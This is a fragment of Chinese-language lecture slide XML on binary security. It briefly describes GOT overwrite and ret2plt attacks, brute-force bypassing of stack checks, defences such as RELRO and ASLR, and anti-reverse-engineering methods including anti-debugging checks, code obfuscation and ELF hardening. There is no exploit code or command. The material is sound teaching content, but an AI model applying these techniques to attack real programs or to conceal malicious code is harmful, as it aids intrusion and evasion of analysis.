              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>段进行覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从而间接控制代码的执行流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        当程序出现栈帧检测，我们也可以通过暴力覆盖的方法来绕过。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御：编程时产生位置无关的代码，设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表可写不可执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, PLT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表可执行不可写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>他们相互作用来实现函数符号的延时绑定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并不随机化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PLT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所以对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ret2plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击没有直接影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为防止恶意修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>链接器提供了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RELRO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>去除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的写权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>但也牺牲了延时绑定带来的好处</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750695" y="1181100"/>
            <a:ext cx="7924800" cy="666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spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反逆向的技术 （一）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750695" y="2009775"/>
            <a:ext cx="8429625" cy="4482465"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>消除符号信息（基于字节码的语言）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>加密代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反调试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>API函数 IsDebuggerPresent和NtQuerySystemInformation</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>针对特定调试器的方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pushfd和popfd检验陷阱标志位，针对单步跟踪</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>随机的代码完整性检查，针对断点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>迷惑反汇编器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>线性扫描、递归遍历</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>假分支。编程中使用宏插入小段汇编代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>间接跳转</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674495" y="1130300"/>
            <a:ext cx="10515600" cy="916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spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反逆向的技术 （二）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674495" y="2157730"/>
            <a:ext cx="10515600" cy="4231005"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>代码混淆</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>控制流变换</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内联和外联</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>交叉代码，将两个或多个函数的代码交叉排列</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>次序变换（针对没有依赖关系的操作）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据变换</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修改变量编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重构数组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764540" y="1468120"/>
            <a:ext cx="10791190" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的拓展：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>加固和脱壳</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加固：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>strip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令去除符号表，构造一个损坏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Section Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
